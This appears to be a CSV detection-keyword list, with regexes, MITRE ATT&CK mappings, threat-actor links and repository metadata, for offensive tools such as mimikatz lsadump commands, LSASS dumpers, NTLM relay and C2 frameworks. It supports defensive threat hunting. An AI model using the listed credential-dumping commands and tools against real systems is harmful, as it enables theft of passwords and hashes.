"*lsadump::dcsync*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51390"
"*lsadump::dcsync*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51391"
"*lsadump::lsa*",".{0,1000}lsadump\:\:lsa.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51392"
"*lsadump::mbc*",".{0,1000}lsadump\:\:mbc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51393"
"*lsadump::netsync*",".{0,1000}lsadump\:\:netsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51394"
"*lsadump::packages*",".{0,1000}lsadump\:\:packages.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51395"
"*lsadump::postzerologon*",".{0,1000}lsadump\:\:postzerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51396"
"*lsadump::RpData*",".{0,1000}lsadump\:\:RpData.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51397"
"*lsadump::sam*",".{0,1000}lsadump\:\:sam.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51398"
"*lsadump::secrets*",".{0,1000}lsadump\:\:secrets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51399"
"*lsadump::setntlm*",".{0,1000}lsadump\:\:setntlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51400"
"*lsadump::trust*",".{0,1000}lsadump\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51401"
"*lsadump::zerologon*",".{0,1000}lsadump\:\:zerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51402"
"*lsarelayx Starting....*",".{0,1000}lsarelayx\sStarting\.\.\.\..{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","51403"
"*lsarelayx.exe*",".{0,1000}lsarelayx\.exe.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","51404"
"*lsarelayx_0.1_ALPHA.zip*",".{0,1000}lsarelayx_0\.1_ALPHA\.zip.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","51405"
"*lsarpc_##*",".{0,1000}lsarpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","51406"
"*LSASecretDefaultPassword*",".{0,1000}LSASecretDefaultPassword.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","51407"
"*lsasecrets.py*",".{0,1000}lsasecrets\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51408"
"*-LSASecrets.txt*",".{0,1000}\-LSASecrets\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","51409"
"*lsasecretslive.py*",".{0,1000}lsasecretslive\.py.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","51410"
"*lsass comsvcs*",".{0,1000}lsass\scomsvcs.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51411"
"*lsass direct*",".{0,1000}lsass\sdirect.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51412"
"*Lsass Dump File Created*",".{0,1000}Lsass\sDump\sFile\sCreated.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","51413"
"*lsass dump from agent*",".{0,1000}lsass\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51414"
"*LSASS dump might fail if RunAsPPL is enabled*",".{0,1000}LSASS\sdump\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","51415"
"*lsass dump saved to: *",".{0,1000}lsass\sdump\ssaved\sto\:\s.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#content","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","51416"
"*Lsass minidump can be imported in *",".{0,1000}Lsass\sminidump\scan\sbe\simported\sin\s.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","51417"
